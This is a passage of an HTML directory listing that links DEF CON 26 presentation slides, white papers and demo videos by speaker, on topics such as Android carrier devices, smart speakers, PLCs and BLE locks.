&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou/DEFCON-26-Johnson-and-Stavrou-Demo-Videos/maliciousApp.mp4"&gt;maliciousApp.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou/DEFCON-26-Johnson-and-Stavrou-Demo-Videos/zte-zmax-champ-brick.mp4"&gt;zte-zmax-champ-brick.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou/DEFCON-26-Johnson-and-Stavrou-Vulnerable-Out-of-the-Box-An-Eval-of-Android-Carrier-Devices-WP.pdf"&gt;Johnson-and-Stavrou-Vulnerable-Out-of-the-Box-An-Eval-of-Android-Carrier-Devices-WP.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou/DEFCON-26-Johnson-and-Stavrou-Vulnerable-Out-of-the-Box-An-Eval-of-Android-Carrier-Devices.pdf"&gt;Johnson-and-Stavrou-Vulnerable-Out-of-the-Box-An-Eval-of-Android-Carrier-Devices.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Ryan Johnson and Angelos Stavrou - Updated

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Johnson-and-Stavrou-Demo-Videos-Updated

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou%20-%20Updated/DEFCON-26-Johnson-and-Stavrou-Demo-Videos-Updated/commExec.mp4"&gt;commExec.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou%20-%20Updated/DEFCON-26-Johnson-and-Stavrou-Demo-Videos-Updated/factory_reset.mp4"&gt;factory_reset.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou%20-%20Updated/DEFCON-26-Johnson-and-Stavrou-Demo-Videos-Updated/lock_user_out.mp4"&gt;lock_user_out.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou%20-%20Updated/DEFCON-26-Johnson-and-Stavrou-Demo-Videos-Updated/maliciousApp.mp4"&gt;maliciousApp.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou%20-%20Updated/DEFCON-26-Johnson-and-Stavrou-Demo-Videos-Updated/modem_and_logcat_logs_zte.mp4"&gt;modem_and_logcat_logs_zte.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou%20-%20Updated/DEFCON-26-Johnson-and-Stavrou-Demo-Videos-Updated/take_screenshot.mp4"&gt;take_screenshot.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou%20-%20Updated/DEFCON-26-Johnson-and-Stavrou-Demo-Videos-Updated/zte_zmax_champ_brick.mp4"&gt;zte_zmax_champ_brick.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou%20-%20Updated/DEFCON-26-Johnson-and-Stavrou-Vulnerable-Out-of-the-Box-An-Eval-of-Android-Carrier-Devices-Updated.pdf"&gt;Johnson-and-Stavrou-Vulnerable-Out-of-the-Box-An-Eval-of-Android-Carrier-Devices-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou%20-%20Updated/DEFCON-26-Johnson-and-Stavrou-Vulnerable-Out-of-the-Box-An-Eval-of-Android-Carrier-Devices-WP-Updated.pdf"&gt;Johnson-and-Stavrou-Vulnerable-Out-of-the-Box-An-Eval-of-Android-Carrier-Devices-WP-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Sanat Sharma

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Sanat%20Sharma/DEFCON-26-Sanat-Sharma-House-of-Roman-Demo-Video.mp4"&gt;Sanat-Sharma-House-of-Roman-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Sanat%20Sharma/DEFCON-26-Sanat-Sharma-House-of-Roman.pdf"&gt;Sanat-Sharma-House-of-Roman.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Sheila A Berta and Sergio De Los Santos

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Sheila-A-Berta-and-Sergio-De-Los-Santos-Demo-Video

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Sheila%20A%20Berta%20and%20Sergio%20De%20Los%20Santos/DEFCON-26-Sheila-A-Berta-and-Sergio-De-Los-Santos-Demo-Video/freetool.mp4"&gt;freetool.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Sheila%20A%20Berta%20and%20Sergio%20De%20Los%20Santos/DEFCON-26-Sheila-A-Berta-and-Sergio-De-Los-Santos-Demo-Video/gmtruntime.mp4"&gt;gmtruntime.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Sheila%20A%20Berta%20and%20Sergio%20De%20Los%20Santos/DEFCON-26-Sheila-A-Berta-and-Sergio-De-Los-Santos-Tracking-Android-Malware-Developers.pdf"&gt;Sheila-A-Berta-and-Sergio-De-Los-Santos-Tracking-Android-Malware-Developers.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Siegfried Rasthofer and Stephan Huber

&lt;ul&gt;
&lt;li&gt;Siegfried-Rasthofer-and-Stephan-Huber-Demo-Video

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Siegfried%20Rasthofer%20and%20Stephan%20Huber/Siegfried-Rasthofer-and-Stephan-Huber-Demo-Video/demovideo.mp4"&gt;demovideo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Siegfried%20Rasthofer%20and%20Stephan%20Huber/Siegfried-Rasthofer-and-Stephan-Huber-Demo-Video/greenalp-cast.mp4"&gt;greenalp-cast.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Siegfried%20Rasthofer%20and%20Stephan%20Huber/DEFCON-26-Siegfried-Rasthofer-and-Stephan-Huber-All-Your-Family-Secrets-Belong-to-Us.pdf"&gt;Siegfried-Rasthofer-and-Stephan-Huber-All-Your-Family-Secrets-Belong-to-Us.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Siegfried Rasthofer and Stephan Huber - Updated

&lt;ul&gt;
&lt;li&gt;Siegfried-Rasthofer-and-Stephan-Huber-Demo-Video-Updated

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Siegfried%20Rasthofer%20and%20Stephan%20Huber%20-%20Updated/Siegfried-Rasthofer-and-Stephan-Huber-Demo-Video-Updated/demovideo_Version2.mp4"&gt;demovideo_Version2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Siegfried%20Rasthofer%20and%20Stephan%20Huber%20-%20Updated/Siegfried-Rasthofer-and-Stephan-Huber-Demo-Video-Updated/greenalpdemo_Version2.mp4"&gt;greenalpdemo_Version2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Siegfried%20Rasthofer%20and%20Stephan%20Huber%20-%20Updated/DEFCON-26-Siegfried-Rasthofer-and-Stephan-Huber-All-Your-Family-Secrets-Belong-to-Us-Updated.pdf"&gt;Siegfried-Rasthofer-and-Stephan-Huber-All-Your-Family-Secrets-Belong-to-Us-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Silke Holtmanns and Isha Singh

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Silke%20Holtmanns%20and%20Isha%20Singh/DEFCON-26-Holtmanns-Singh-4G-Who-is-Paying-your-cell-phone-bill.pdf"&gt;Holtmanns-Singh-4G-Who-is-Paying-your-cell-phone-bill.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Slava Makkaveev

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Slava-Makkaveev-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Slava%20Makkaveev/DEFCON-26-Slava-Makkaveev-Demo-Videos/DEFCON-26-Slava-Makkaveev-MITD-Demo1-GoogleTranslate.mp4"&gt;Slava-Makkaveev-MITD-Demo1-GoogleTranslate.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Slava%20Makkaveev/DEFCON-26-Slava-Makkaveev-Demo-Videos/DEFCON-26-Slava-Makkaveev-MITD-Demo2-LGAppManager.mp4"&gt;Slava-Makkaveev-MITD-Demo2-LGAppManager.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Slava%20Makkaveev/DEFCON-26-Slava-Makkaveev-Demo-Videos/DEFCON-26-Slava-Makkaveev-MITD-Demo3-XiaomiBrowser.mp4"&gt;Slava-Makkaveev-MITD-Demo3-XiaomiBrowser.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Slava%20Makkaveev/DEFCON-26-Slava-Makkaveev-Man-In-The-Disk.pdf"&gt;Slava-Makkaveev-Man-In-The-Disk.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Stark Riedesel and Parsia Hakimian

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Stark-Riedesel-and-Parsia-Hakimian-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Stark%20Riedesel%20and%20Parsia%20Hakimian/DEFCON-26-Stark-Riedesel-and-Parsia-Hakimian-Demo-Videos/1-tineola-enum-demo.mp4"&gt;1-tineola-enum-demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Stark%20Riedesel%20and%20Parsia%20Hakimian/DEFCON-26-Stark-Riedesel-and-Parsia-Hakimian-Demo-Videos/2-tineola-invoke-TXes.mp4"&gt;2-tineola-invoke-TXes.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Stark%20Riedesel%20and%20Parsia%20Hakimian/DEFCON-26-Stark-Riedesel-and-Parsia-Hakimian-Demo-Videos/2-tineola-invoke-demo.mp4"&gt;2-tineola-invoke-demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Stark%20Riedesel%20and%20Parsia%20Hakimian/DEFCON-26-Stark-Riedesel-and-Parsia-Hakimian-Demo-Videos/3-tineola-fuzzing-demo.mp4"&gt;3-tineola-fuzzing-demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Stark%20Riedesel%20and%20Parsia%20Hakimian/DEFCON-26-Stark-Riedesel-and-Parsia-Hakimian-Demo-Videos/4-tineolacc-install.mp4"&gt;4-tineolacc-install.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Stark%20Riedesel%20and%20Parsia%20Hakimian/DEFCON-26-Stark-Riedesel-and-Parsia-Hakimian-Demo-Videos/5-tineola-nmap-scan.mp4"&gt;5-tineola-nmap-scan.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Stark%20Riedesel%20and%20Parsia%20Hakimian/DEFCON-26-Stark-Riedesel-and-Parsia-Hakimian-Demo-Videos/6-tineola-direct-db-TXes.mp4"&gt;6-tineola-direct-db-TXes.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Stark%20Riedesel%20and%20Parsia%20Hakimian/DEFCON-26-Stark-Riedesel-and-Parsia-Hakimian-Demo-Videos/6-tineola-direct-db-demo.mp4"&gt;6-tineola-direct-db-demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Stark%20Riedesel%20and%20Parsia%20Hakimian/DEFCON-26-Stark-Riedesel-and-Parsia-Hakimian-Tineola-Taking-Bite-Out-of-Enterprise-Blockchain.pdf"&gt;Stark-Riedesel-and-Parsia-Hakimian-Tineola-Taking-Bite-Out-of-Enterprise-Blockchain.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Thanh Bui and Siddharth Rao

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Thanh-Bui-and-Siddharth-Rao-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Thanh%20Bui%20and%20Siddharth%20Rao/DEFCON-26-Thanh-Bui-and-Siddharth-Rao-Demo-Videos/1password-demo.mp4"&gt;1password-demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Thanh%20Bui%20and%20Siddharth%20Rao/DEFCON-26-Thanh-Bui-and-Siddharth-Rao-Demo-Videos/fido-demo.mp4"&gt;fido-demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Thanh%20Bui%20and%20Siddharth%20Rao/DEFCON-26-Thanh-Bui-and-Siddharth-Rao-Last-Mile-Auth-Problem-Exploiting-End-to-End.pdf"&gt;Thanh-Bui-and-Siddharth-Rao-Last-Mile-Auth-Problem-Exploiting-End-to-End.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The Tarquin

&lt;ul&gt;
&lt;li&gt;DEFCON-26-The-Tarquin-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/The%20Tarquin/DEFCON-26-The-Tarquin-Demo-Videos/homograph-ocr.mp4"&gt;homograph-ocr.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/The%20Tarquin/DEFCON-26-The-Tarquin-Demo-Videos/homographbomb.mp4"&gt;homographbomb.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/The%20Tarquin/DEFCON-26-The-Tarquin-Demo-Videos/java-homograph.mp4"&gt;java-homograph.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/The%20Tarquin/DEFCON-26-The-Tarquin-Weaponizing-Unicode-Homographs-Beyond-IDNs.pdf"&gt;The-Tarquin-Weaponizing-Unicode-Homographs-Beyond-IDNs.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Thiago Alves

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Thiago-Alves-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Thiago%20Alves/DEFCON-26-Thiago-Alves-Demo-Videos/first-attack.mp4"&gt;first-attack.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Thiago%20Alves/DEFCON-26-Thiago-Alves-Demo-Videos/second-attack.mp4"&gt;second-attack.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Thiago%20Alves/DEFCON-26-Thiago-Alves-Demo-Videos/third-attack.mp4"&gt;third-attack.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Thiago%20Alves/DEFCON-26-Thiago-Alves-Hacking-PLCs-and-Causing-Havoc-on-Critical-Infrastructures.pdf"&gt;Thiago-Alves-Hacking-PLCs-and-Causing-Havoc-on-Critical-Infrastructures.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Torani - Buchwald - Nirenberg

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Torani%20-%20Buchwald%20-%20Nirenberg/DEFCON-26-Torani-Buchwald-Nirenberg-Reverse-Engineering-Hacker-Docu-Series-Sample-Scene.mp4"&gt;Torani-Buchwald-Nirenberg-Reverse-Engineering-Hacker-Docu-Series-Sample-Scene.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Torani%20-%20Buchwald%20-%20Nirenberg/DEFCON-26-Torani-Buchwald-Nirenberg-Reverse-Engineering-Hacker-Docu-Series.pdf"&gt;Torani-Buchwald-Nirenberg-Reverse-Engineering-Hacker-Docu-Series.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Truman Kain

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Truman%20Kain/DEFCON-26-Truman-Kain-Demo-Video.mp4"&gt;Truman-Kain-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Truman%20Kain/DEFCON-26-Truman-Kain-Dragnet-Social-Engineering-Sidekick.pdf"&gt;Truman-Kain-Dragnet-Social-Engineering-Sidekick.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Truman Kain - Updated

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Truman%20Kain%20-%20Updated/DEFCON-26-Truman-Kain-Demo-Video-Updated.mp4"&gt;Truman-Kain-Demo-Video-Updated.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Truman%20Kain%20-%20Updated/DEFCON-26-Truman-Kain-Dragnet-Social-Engineering-Sidekick-Updated.pdf"&gt;Truman-Kain-Dragnet-Social-Engineering-Sidekick-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Vincent Tan

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Vincent-Tan-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Vincent%20Tan/DEFCON-26-Vincent-Tan-Demo-Videos/DEFCON-26-Vincent-Tan-Hacking-BLE-Bicycle-Locks-Demo-Video-1.mp4"&gt;Vincent-Tan-Hacking-BLE-Bicycle-Locks-Demo-Video-1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Vincent%20Tan/DEFCON-26-Vincent-Tan-Demo-Videos/DEFCON-26-Vincent-Tan-Hacking-BLE-Bicycle-Locks-Demo-Video-2.mp4"&gt;Vincent-Tan-Hacking-BLE-Bicycle-Locks-Demo-Video-2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Vincent%20Tan/DEFCON-26-Vincent-Tan-Hacking-BLE-Bicycle-Locks.pdf"&gt;Vincent-Tan-Hacking-BLE-Bicycle-Locks.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Wesley McGrew

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Wesley%20McGrew/DEFCON-26-Wesley-McGrew-An-Attacker-Looks-at-Docker-Demo-Video.mp4"&gt;Wesley-McGrew-An-Attacker-Looks-at-Docker-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Wesley%20McGrew/DEFCON-26-Wesley-McGrew-An-Attacker-Looks-at-Docker-WP.pdf"&gt;Wesley-McGrew-An-Attacker-Looks-at-Docker-WP.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Wesley%20McGrew/DEFCON-26-Wesley-McGrew-An-Attacker-Looks-at-Docker.pdf"&gt;Wesley-McGrew-An-Attacker-Looks-at-Docker.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;William Martin

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/William%20Martin/DEFCON-26-William-Martin-SMBetray-Backdooring-and-Breaking-Signiatures.pdf"&gt;William-Martin-SMBetray-Backdooring-and-Breaking-Signiatures.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/William%20Martin/DEFCON-26-William-Martin-SMBetray-Demo-Video.mp4"&gt;William-Martin-SMBetray-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Wu HuiYu and Qian Wenxiang

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Wu-HuiYu-and-Qian-Wenxiang-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Wu%20HuiYu%20and%20Qian%20Wenxiang/DEFCON-26-Wu-HuiYu-and-Qian-Wenxiang-Demo-Videos/MI-AI-SPEAKER-MIIO.mp4"&gt;MI-AI-SPEAKER-MIIO.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Wu%20HuiYu%20and%20Qian%20Wenxiang/DEFCON-26-Wu-HuiYu-and-Qian-Wenxiang-Demo-Videos/MI-AI-SPEAKER-RCE.mp4"&gt;MI-AI-SPEAKER-RCE.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Wu%20HuiYu%20and%20Qian%20Wenxiang/DEFCON-26-Wu-HuiYu-and-Qian-Wenxiang-Demo-Videos/amazon-echo-2soldering.mp4"&gt;amazon-echo-2soldering.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Wu%20HuiYu%20and%20Qian%20Wenxiang/DEFCON-26-Wu-HuiYu-and-Qian-Wenxiang-Demo-Videos/amazon-echo-desoldering.mp4"&gt;amazon-echo-desoldering.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Wu%20HuiYu%20and%20Qian%20Wenxiang/DEFCON-26-Wu-HuiYu-and-Qian-Wenxiang-Demo-Videos/amazon-echo-exploit.mp4"&gt;amazon-echo-exploit.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Wu%20HuiYu%20and%20Qian%20Wenxiang/DEFCON-26-Wu-HuiYu-and-Qian-Wenxiang-Demo-Videos/breaking-smart-speaker-video-1.mp4"&gt;breaking-smart-speaker-video-1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Wu%20HuiYu%20and%20Qian%20Wenxiang/DEFCON-26-Wu-HuiYu-and-Qian-Wenxiang-Demo-Videos/breaking-smart-speaker-video-2.mp4"&gt;breaking-smart-speaker-video-2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Wu%20HuiYu%20and%20Qian%20Wenxiang/DEFCON-26-Wu-HuiYu-and-Qian-Wenxiang-Demo-Videos/breaking-smart-speaker-video-3.mp4"&gt;breaking-smart-speaker-video-3.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Wu%20HuiYu%20and%20Qian%20Wenxiang/DEFCON-26-Wu-HuiYu-and-Qian-Wenxiang-Demo-Videos/breaking-smart-speaker-video-4.mp4"&gt;breaking-smart-speaker-video-4.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Wu%20HuiYu%20and%20Qian%20Wenxiang/DEFCON-26-Wu-HuiYu-and-Qian-Wenxiang-Breaking-Smart-Speakers.pdf"&gt;Wu-HuiYu-and-Qian-Wenxiang-Breaking-Smart-Speakers.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Xiaolong Bai and Min Zheng

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Xiaolong-Bai-and-Min-Zheng-Demo-Video

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Xiaolong%20Bai%20and%20Min%20Zheng/DEFCON-26-Xiaolong-Bai-and-Min-Zheng-Demo-Video/DemoOnPage13.mp4"&gt;DemoOnPage13.mp4&lt;/a&gt;&lt;/li&gt;
